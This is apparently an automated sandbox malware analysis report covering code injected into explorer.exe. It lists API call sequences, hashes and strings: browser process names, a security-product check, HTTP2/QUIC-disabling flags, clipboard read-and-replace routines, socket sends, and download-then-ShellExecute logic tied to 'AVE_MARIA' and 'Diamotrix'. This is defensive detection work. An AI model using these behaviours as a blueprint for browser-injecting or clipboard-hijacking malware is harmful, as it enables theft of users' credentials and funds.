                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocQuery$InfoSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 768245703-0
                                                                                                                                                                                                                                  • Opcode ID: 93733bfa0dface053fca03936f02942d9e1b0f03c42b701bbe2b4e4918eb40e6
                                                                                                                                                                                                                                  • Instruction ID: 245e16c4f852f213fd2ef4d35425db8c43f827612430fcb295b7f3598e48e3b5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93733bfa0dface053fca03936f02942d9e1b0f03c42b701bbe2b4e4918eb40e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B51CF32B12E5085EB158F62D5047A87776B708FE6F088025CE6E6BB08DB78CA878341

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 08CBC4BC: WideCharToMultiByte.KERNEL32 ref: 08CBC4FC
                                                                                                                                                                                                                                    • Part of subcall function 08CBC4BC: malloc.LIBCMT ref: 08CBC50D
                                                                                                                                                                                                                                    • Part of subcall function 08CBC4BC: WideCharToMultiByte.KERNEL32 ref: 08CBC53D
                                                                                                                                                                                                                                  • malloc.LIBCMT ref: 08CBC045
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _FF_MSGBANNER.LIBCMT ref: 08CB2FF4
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _NMSG_WRITE.LIBCMT ref: 08CB2FFE
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: HeapAlloc.KERNEL32 ref: 08CB3019
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _callnewh.LIBCMT ref: 08CB3032
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB303D
                                                                                                                                                                                                                                    • Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB3048
                                                                                                                                                                                                                                  • PathFindFileNameA.SHLWAPI ref: 08CBC050
                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 08CBC066
                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32 ref: 08CBC09D
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 08CBC0AF
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 08CBC0C1
                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI ref: 08CBC0CC
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBC0F4
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBC108
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBC11C
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBC130
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBC144
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBC158
                                                                                                                                                                                                                                  • lstrcmpiA.KERNEL32 ref: 08CBC16C
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 08CBC186
                                                                                                                                                                                                                                    • Part of subcall function 08CBC3E0: GetNativeSystemInfo.KERNEL32 ref: 08CBC3F2
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32 ref: 08CBC261
                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 08CBC297
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 08CBC2C4
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 08CBC2E4
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 08CBC300
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 08CBC313
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 08CBC333
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 08CBC34E
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 08CBC357
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 08CBC377
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 08CBC392
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 08CBC39B
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08CBC3A4
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08CBC3AC
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08CBC3B4
                                                                                                                                                                                                                                  • free.LIBCMT ref: 08CBC3BC
                                                                                                                                                                                                                                    • Part of subcall function 08CBC55C: CreateFileA.KERNEL32 ref: 08CBC5B0
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$lstrcmpi$Write$free$Pathlstrcat$ByteCharCreateMultiWide_errnolstrlenmalloc$AllocCloseExistsFindFolderHandleHeapInfoNameNativeProcessSystemTerminate_callnewhlstrcpywsprintf
                                                                                                                                                                                                                                  • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$msedge.exe$opera.exe$trusteer
                                                                                                                                                                                                                                  • API String ID: 1527040651-3547472259
                                                                                                                                                                                                                                  • Opcode ID: 58e5fa22f7c873d686ce76318caff127ff3cb5475a8f9787b37d37c67098cb26
                                                                                                                                                                                                                                  • Instruction ID: 2b3fc9e18c295eb50cab00d1be3d7484888dc5cd67a2ea58b0be13473a7c4d75
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58e5fa22f7c873d686ce76318caff127ff3cb5475a8f9787b37d37c67098cb26
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54A17572204F82C6EB14DF26F854B9A77B4F789B95F448026DA8A47B18DF3CD249CB50

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0F3C6A7C
                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET ref: 0F3C6A91
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcpy.KERNEL32 ref: 0F3C4573
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4582
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4594
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45A6
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45B5
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45C7
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C45E3
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: wsprintfA.USER32 ref: 0F3C45F9
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C4609
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C461B
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrcatA.KERNEL32 ref: 0F3C462D
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: WSAStartup.WS2_32 ref: 0F3C463F
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: socket.WS2_32 ref: 0F3C465F
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: gethostbyname.WS2_32 ref: 0F3C4679
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: memcpy.MSVCRT ref: 0F3C4699
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: htons.WS2_32 ref: 0F3C46A9
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: connect.WS2_32 ref: 0F3C46C0
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: lstrlenA.KERNEL32 ref: 0F3C46D3
                                                                                                                                                                                                                                    • Part of subcall function 0F3C4520: send.WS2_32 ref: 0F3C46E7
                                                                                                                                                                                                                                  • PathFindFileNameA.SHLWAPI ref: 0F3C6B08
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32 ref: 0F3C6B26
                                                                                                                                                                                                                                  • GetTempFileNameA.KERNEL32 ref: 0F3C6B3C
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C6B4C
                                                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0F3C6B58
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0F3C6B83
                                                                                                                                                                                                                                  • WriteFile.KERNEL32 ref: 0F3C6BA9
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3C6BB8
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0F3C6BC1
                                                                                                                                                                                                                                  • ShellExecuteA.SHELL32 ref: 0F3C6BED
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0F3C6BFC
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3C6C07
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcat$File$??3@CloseHandleNamePathTemplstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2207453364-0
                                                                                                                                                                                                                                  • Opcode ID: eb2a70d6ba61a70606d257063704161deacf3da45e0fbe9ce99daad9c34fbcb0
                                                                                                                                                                                                                                  • Instruction ID: 4c601dac5ae115d77127492fe2980b07f718c63971cb6eb9690e8d7c2a7da578
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb2a70d6ba61a70606d257063704161deacf3da45e0fbe9ce99daad9c34fbcb0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5515E32B04B4186EB20CF66E8547AE77A1F788BA4F444129DE4D47B68DF7CC688CB40

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcmpi$FileName$CloseCreateFindHandleModulePathThread
                                                                                                                                                                                                                                  • String ID: chrome.exe$explorer.exe$firefox.exe$msedge.exe
                                                                                                                                                                                                                                  • API String ID: 2683099952-590483109
                                                                                                                                                                                                                                  • Opcode ID: 874950943a249c877d6e1838912ccb95b0977777b475de4bf467ea38f4e5ba2a
                                                                                                                                                                                                                                  • Instruction ID: ff54049ab6d9ebec147452702bafce80fdca06a94d89a820ed892ffbbb02a665
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 874950943a249c877d6e1838912ccb95b0977777b475de4bf467ea38f4e5ba2a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E218021614B4695FF20EB72FC443AD6361AB88BB1F841039E94A46A67EF7CC74CE750

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 319 8cbbf44-8cbbf58 call 8cb1bb4 322 8cbbf5a-8cbbf61 call 8cbd1e0 319->322 323 8cbbf6e-8cbbf86 call 8cbd1d0 319->323 326 8cbbf67 322->326 328 8cbbf88-8cbbf9b GetProcAddress 323->328 329 8cbbfa5-8cbbfb5 call 8cbd1d0 323->329 326->323 328->329 330 8cbbf9d-8cbbfa0 call 8cb1bf4 328->330 334 8cbbfb7-8cbbfca GetProcAddress 329->334 335 8cbbfd4-8cbbfe0 call 8cb1bb4 329->335 330->329 334->335 337 8cbbfcc-8cbbfcf call 8cb1bf4 334->337 340 8cbbfec-8cbbff9 335->340 341 8cbbfe2-8cbbfe7 call 8cb1aec 335->341 337->335 341->340
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProc$CreateHeap
                                                                                                                                                                                                                                  • String ID: CreateProcessInternalW$CreateProcessInternalW$Kernel32.dll$KernelBase.dll
                                                                                                                                                                                                                                  • API String ID: 3177369204-2552458873
                                                                                                                                                                                                                                  • Opcode ID: 4d3072ef696aade75c17de1f9947264c645c80e7f162884d0f5ec5e2810a1d2a
                                                                                                                                                                                                                                  • Instruction ID: 9970443adda07e5c136c5b9a74ecc55ac64f7ee80d66cb09245f42d4a72226b0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d3072ef696aade75c17de1f9947264c645c80e7f162884d0f5ec5e2810a1d2a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35112D68612F5186FF69EFB5A855FA433B4BB84712F48843EC98E42350EF3C8585C720

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 546 f3c68f0-f3c6953 lstrcpy call f3c6130 550 f3c69c8-f3c69dc call f3fe6f0 call f3fe828 SleepEx 546->550 551 f3c6955-f3c6967 call f3fe7b0 546->551 557 f3c6969-f3c696e call f3c6dc0 551->557 558 f3c6970-f3c6997 StrChrA StrStrA 551->558 557->550 561 f3c6999-f3c699c 558->561 562 f3c69a0-f3c69a3 558->562 561->562 564 f3c69a5-f3c69be strtol call f3c6c2c 562->564 565 f3c69c3-f3c69c6 562->565 564->565 565->550 565->558
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • lstrcpy.KERNEL32 ref: 0F3C6938
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: EnterCriticalSection.KERNEL32 ref: 0F3C6170
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: RtlInitializeCriticalSection.NTDLL ref: 0F3C617D
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61AA
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61CD
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61DD
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61ED
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: LeaveCriticalSection.KERNEL32 ref: 0F3C624C
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: memcpy.MSVCRT ref: 0F3C6263
                                                                                                                                                                                                                                    • Part of subcall function 0F3C6130: lstrlenA.KERNEL32 ref: 0F3C6270
                                                                                                                                                                                                                                  • lstrcmp.KERNEL32 ref: 0F3C695F
                                                                                                                                                                                                                                  • StrChrA.SHLWAPI ref: 0F3C6978
                                                                                                                                                                                                                                  • StrStrA.SHLWAPI ref: 0F3C698B
                                                                                                                                                                                                                                  • strtol.MSVCRT ref: 0F3C69B2
                                                                                                                                                                                                                                  • ??3@YAXPEAX@Z.MSVCRT ref: 0F3C69CB
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0F3C69D6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalSectionlstrcpy$lstrcat$??3@EnterInitializeLeaveSleeplstrcmplstrlenmemcpystrtol
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1856114479-0
                                                                                                                                                                                                                                  • Opcode ID: e25bd308d87e3a947bc2d9e8e8747897f02e1ecd5d267791c423b28eb347718d
                                                                                                                                                                                                                                  • Instruction ID: 52b96ea44cafe7d918459374ecd9702987c61b519e31096d7d3ed031113da0b0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e25bd308d87e3a947bc2d9e8e8747897f02e1ecd5d267791c423b28eb347718d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F219D21615B41C5EB24DF21E84436D77A5FB88FA0F484038CA8E47B65EF3CD649C784

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0F3CFE98: OpenClipboard.USER32 ref: 0F3CFEAE
                                                                                                                                                                                                                                    • Part of subcall function 0F3CFE98: GetClipboardData.USER32 ref: 0F3CFEBB
                                                                                                                                                                                                                                    • Part of subcall function 0F3CFE98: GlobalLock.KERNEL32 ref: 0F3CFECC
                                                                                                                                                                                                                                    • Part of subcall function 0F3CFE98: GlobalUnlock.KERNEL32 ref: 0F3CFEDD
                                                                                                                                                                                                                                    • Part of subcall function 0F3CFE98: CloseClipboard.USER32 ref: 0F3CFEE3
                                                                                                                                                                                                                                    • Part of subcall function 0F3D006C: GlobalAlloc.KERNEL32 ref: 0F3D0094
                                                                                                                                                                                                                                    • Part of subcall function 0F3D006C: GlobalLock.KERNEL32 ref: 0F3D00AB
                                                                                                                                                                                                                                    • Part of subcall function 0F3D006C: GlobalUnlock.KERNEL32 ref: 0F3D00C3
                                                                                                                                                                                                                                    • Part of subcall function 0F3D006C: OpenClipboard.USER32 ref: 0F3D00CB
                                                                                                                                                                                                                                    • Part of subcall function 0F3D006C: EmptyClipboard.USER32 ref: 0F3D00D1
                                                                                                                                                                                                                                    • Part of subcall function 0F3D006C: SetClipboardData.USER32 ref: 0F3D00DF
                                                                                                                                                                                                                                    • Part of subcall function 0F3D006C: CloseClipboard.USER32 ref: 0F3D00E5
                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0F3CFD94
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • EC8TNV4TJis1EzAgWxY+EwEWNzEmNAIdRAABElglKicMMw==, xrefs: 0F3CF9D0
                                                                                                                                                                                                                                  • dV4CPSwzJx8ODjAtKx02CAxJBhMCNR0HP18fBg8kXCMgKw==, xrefs: 0F3CF98B
                                                                                                                                                                                                                                  • CAAlOSRNBz0SPTkvIB1GHwY/LTNUNzclEyUOIgIYKl4tRQ==, xrefs: 0F3CFA15
                                                                                                                                                                                                                                  • Diamotrix, xrefs: 0F3CF977
                                                                                                                                                                                                                                  • dBFTDFkSQwpJJlFZWFlAFFsdIFlXX1tGSgtIfFgCXgxCSl9NfFpWVVYX, xrefs: 0F3CFA5A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptySleep
                                                                                                                                                                                                                                  • String ID: CAAlOSRNBz0SPTkvIB1GHwY/LTNUNzclEyUOIgIYKl4tRQ==$Diamotrix$EC8TNV4TJis1EzAgWxY+EwEWNzEmNAIdRAABElglKicMMw==$dBFTDFkSQwpJJlFZWFlAFFsdIFlXX1tGSgtIfFgCXgxCSl9NfFpWVVYX$dV4CPSwzJx8ODjAtKx02CAxJBhMCNR0HP18fBg8kXCMgKw==
                                                                                                                                                                                                                                  • API String ID: 2992153386-2234792053
                                                                                                                                                                                                                                  • Opcode ID: d9bac0a79613fcca47700cbee003d1b65288520218388fee38a63978c72ece60
                                                                                                                                                                                                                                  • Instruction ID: dc9a08b825adbea38cbf41e5dfd596ac135f6b30daf8c0600f0f4abd0428694c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9bac0a79613fcca47700cbee003d1b65288520218388fee38a63978c72ece60
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84A11F66204B86A5CF10FB65E8543DE6321FB95798FC0402ADA8D47A5EEF6CCB09C7C0

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                                  • String ID: {%08lX%04lX%lu}
                                                                                                                                                                                                                                  • API String ID: 3001812590-1877128471
                                                                                                                                                                                                                                  • Opcode ID: adb46bb215b8b7846f3099994807b5415528fffdb88278e748a75d101c16c107
                                                                                                                                                                                                                                  • Instruction ID: 60592fd4688daf2f3ee53788c7fbbefd1c7ec2aafc89d4b95fbf5691862ae205
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adb46bb215b8b7846f3099994807b5415528fffdb88278e748a75d101c16c107
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81214B326087C0CAD721CF75E8903DEBBA0F799754F54452AE78983A2CDB78C649CB40

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 784 8cb19ec-8cb1a1b 785 8cb1a1d-8cb1a20 784->785 786 8cb1a25-8cb1a3e VirtualProtect 784->786 785->786 787 8cb1a4a-8cb1a4c 786->787 788 8cb1a40-8cb1a45 786->788 790 8cb1a4e-8cb1a60 787->790 791 8cb1a6c-8cb1a75 787->791 789 8cb1ad6-8cb1aea 788->789 792 8cb1a8d-8cb1aa3 VirtualProtect call 8cbd1c0 790->792 793 8cb1a62-8cb1a6a 790->793 794 8cb1a87-8cb1a8a 791->794 795 8cb1a77-8cb1a85 791->795 797 8cb1aa9-8cb1ad4 FlushInstructionCache 792->797 793->792 794->792 795->792 797->789
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ProtectVirtual$CacheFlushInstruction
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 882653843-0
                                                                                                                                                                                                                                  • Opcode ID: b6463cc818fc626b3a6d75c665f56e6a94a2aae3856024e65fd29bf126e9d28e
                                                                                                                                                                                                                                  • Instruction ID: 6edf07cb7298292b0f6be214318fc4af40e444264ee9915290fe0edf5af9fe15
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6463cc818fc626b3a6d75c665f56e6a94a2aae3856024e65fd29bf126e9d28e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E31DD63208AC086D7108F36A5503A97B70F305F89F0C8216DF994B79ACB3CE452C764
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$CloseHandleOpenResume
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3509856837-0
                                                                                                                                                                                                                                  • Opcode ID: 30d60d981685ac0fb098c174b9d32aa8ee41bb07c3d92f07860992837807bdbc
                                                                                                                                                                                                                                  • Instruction ID: d0f23286bf3153b97d6bfa5e13ccb086ba85fc5d5e9ca2a406622b633e4c0f59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30d60d981685ac0fb098c174b9d32aa8ee41bb07c3d92f07860992837807bdbc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DF01432A15E8082E708CB56E995B597770F789B90F08C02ADB9A03724DF38D5A6CB10
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$Message$recv$CreateFromPointPostSendlstrcat$ProcessRectThreadValue$ClientFindItemLongMenuScreensend$ChildClassCloseDesktopDirectoryFolderMoveOpenPathPlacementQueryRealSleepStartupTerminateWindowslstrcmplstrcpy
                                                                                                                                                                                                                                  • String ID: AVE_MARIA$Button
                                                                                                                                                                                                                                  • API String ID: 2928571645-257500010
                                                                                                                                                                                                                                  • Opcode ID: 36af61125e1c30519cf6cc6c0f0e391ba7867fcb109cd78c9c85eb73fbd3af0c
                                                                                                                                                                                                                                  • Instruction ID: ab147eb3db188ee8e0a438f3570aa462a07a755fa9a8a99c91db36aa95aca670
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36af61125e1c30519cf6cc6c0f0e391ba7867fcb109cd78c9c85eb73fbd3af0c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB226F3271579286EB209F35E8547AE77A5F788BA8F804135EE4A47F69DF38C248D700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CompatibleCreateDeleteObjectWindow$??3@_malloc_dbg$BitmapSelectStretchmemcpy$BitsDesktopModeRectRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2596202611-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 4262a13877639d82f982d1eae1e36bb45b7eb76710138ab36d42033217d0887a
                                                                                                                                                                                                                                  • Instruction ID: 1f8c1f92f621047d780171297ceae2db44050c580f899caa5c77ab1201bb9c68
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4262a13877639d82f982d1eae1e36bb45b7eb76710138ab36d42033217d0887a
